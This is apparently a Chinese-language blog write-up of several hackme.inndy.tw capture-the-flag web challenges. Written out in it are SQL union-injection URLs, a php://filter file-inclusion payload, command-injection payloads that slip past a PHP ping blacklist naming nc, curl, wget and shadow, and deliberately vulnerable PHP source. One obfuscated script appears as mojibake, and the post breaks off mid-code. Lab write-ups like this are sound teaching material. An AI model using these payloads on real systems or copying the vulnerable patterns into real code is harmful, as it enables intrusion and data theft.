https://wywwzjj.top/2019/02/02/Hackme-Writeup/
hide and seek
Can you see me? I’m so close to you but you can’t see me.
这题查看源码即可。
guestbook
This guestbook sucks. sqlmap is your friend.
既然提示有 sqlmap
,或许可以一把梭。
先手注一波试试,发现没有任何过滤。
有四个字段,看一下显位。
https://hackme.inndy.tw/gb/?mod=read&id=0 union select 1,2,3,4
都有明显回显,直接上吧,盲注太慢。
拿到列名
查询所有数据
https://hackme.inndy.tw/gb/?mod=read&id=0 union select 1,2,3,group_concat(flag) from flag
LFI
What this admin’s password? That is not important at all, just get the flag. Tips: LFI,
php://filter
用到 PHP 伪协议:php://filter
php://filter/read=convert.base64-encode/resource=pages/login
// 得到 login.php
<?php
require('config.php');
if($_POST['user'] === 'admin' && md5($_POST['pass']) === 'bed128365216c019988915ed3add75fb') {
echo $flag;
} else {
?>
<form action="?page=pages/login" method="post" role="form">
<div class="form-group">
<label for="user-i">User</label>
<input type="text" class="form-control" id="user-i" placeholder="Username" name="user">
</div>
<div class="form-group">
<label for="pass-i">Password</label>
<input type="password" class="form-control" id="pass-i" placeholder="Password" name="pass">
</div>
<button type="submit" class="btn btn-primary">Login</button>
</form>
<?php } ?>
// 再看下 config.php,拿到 flag
$flag = "FLAG{Yoooooo_xsXSYP......}";
homepage
Where is the flag? Did you check the code?
提示查看源代码,发现了一个特别的 cute.js
。
嚝从㚁����= /嚚�嚚榅湛�㚁�� ~�?���? //*織����*/ ['_']; o=(嚝�蔑嚝�) =_=3; c=(嚝巵矋��) =(嚝�蔑嚝�)-(嚝�蔑嚝�); (嚝氱䈑��) =(嚝巵矋��)= (o^_^o)/ (o^_^o);(嚝氱䈑��)={嚝巵矋��: '_' ,嚝从㚁���� : ((嚝从㚁����==3) +'_') [嚝巵矋�篏 ,嚝�蔑嚝��� :(嚝从㚁����+ '_')[o^_^o -(嚝巵矋��)] ,嚝氱䈑����:((嚝�蔑嚝�==3) +'_')[嚝�蔑嚝篏 }; (嚝氱䈑��) [嚝巵矋�篏 =((嚝从㚁����==3) +'_') [c^_^o];(嚝氱䈑��) ['c'] = ((嚝氱䈑��)+'_') [ (嚝�蔑嚝�)+(嚝�蔑嚝�)-(嚝巵矋��) ];(嚝氱䈑��) ['o'] = ((嚝氱䈑��)+'_') [嚝巵矋�篏;(嚝剠嚝�)=(嚝氱䈑��) ['c']+(嚝氱䈑��) ['o']+(嚝从㚁���� +'_')[嚝巵矋�篏+ ((嚝从㚁����==3) +'_') [嚝�蔑嚝篏 + ((嚝氱.......
别的师傅说是 aaencode
加密,我有点懵逼,以后再弄吧,这种题不值得多花时间。
ping
Can you ping 127.0.0.1?
看来是源码审计的题目,命令注入。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Ping</title>
</head>
<body>
<form action="." method="GET">
IP: <input type="text" name="ip"> <input type="submit" value="Ping">
</form>
<pre><?php
$blacklist = [
'flag', 'cat', 'nc', 'sh', 'cp', 'touch', 'mv', 'rm', 'ps', 'top', 'sleep', 'sed',
'apt', 'yum', 'curl', 'wget', 'perl', 'python', 'zip', 'tar', 'php', 'ruby', 'kill',
'passwd', 'shadow', 'root',
'z',
'dir', 'dd', 'df', 'du', 'free', 'tempfile', 'touch', 'tee', 'sha', 'x64', 'g',
'xargs', 'PATH',
'$0', 'proc',
'/', '&', '|', '>', '<', ';', '"', '\'', '\\', "\n"
];
set_time_limit(2);
function ping($ip) {
global $blacklist;
if(strlen($ip) > 15) {
return 'IP toooooo longgggggggggg';
} else {
foreach($blacklist as $keyword) {
if(strstr($ip, $keyword)) {
return "{$keyword} not allowed";
}
}
$ret = [];
exec("ping -c 1 \"{$ip}\" 2>&1", $ret);
return implode("\n", array_slice($ret, 0, 10));
}
}
if(!empty($_GET['ip']))
echo htmlentities(ping($_GET['ip']));
else
highlight_file(__FILE__);
?></pre>
</body>
</html>
发现 $
没有在黑名单内,还可以 ``
$(ls) / `ls`
ping: flag.php
index.php: Name or service not known
# cat 被过滤了,但有一堆可以查看文件内容的命令啊
tac 从最后一行开始显示,可以看出 tac 是 cat 的倒着写!
more 一页一页的显示档案内容
less 与 more 类似,但是比 more 更好的是,他可以往前翻页!
head 只看头几行
tail 只看尾巴几行
nl 显示的时候,顺道输出行号!
# 加个 * 模糊匹配一下
$(tac f*)
ping: $flag = 'FLAG{ping_$(capture-the-flag)_U.....}';
<?php: Name or service not known
scoreboard
DO NOT ATTACK or SCAN scoreboard, you don’t need to do that.
header
里发现了 x-flag
。
login as admin 0
SQL Injection!
题目直接给了源码,开始审计。
<?php
require('config.php');
// table schema
// user -> id, user, password, is_admin
function safe_filter($str) {
$strl = strtolower($str);
if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
strstr($strl, 'update') || strstr($strl, 'delete')
) {
return '';
}
return str_replace("'", "\\'", $str);
// \' => \\'
}
$_POST = array_map(safe_filter, $_POST);
$user = null;
// connect to database
if(!empty($_POST['name']) && !empty($_POST['password'])) {
$connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
$db = new PDO($connection_string, DB_USER, DB_PASS);
$sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
$_POST['name'],
$_POST['password']
);
try {
$query = $db->query($sql);
if($query) {
$user = $query->fetchObject();
} else {
$user = false;
}
} catch(Exception $e) {
$user = false;
}
}
<?php if(!$user): ?>
<?php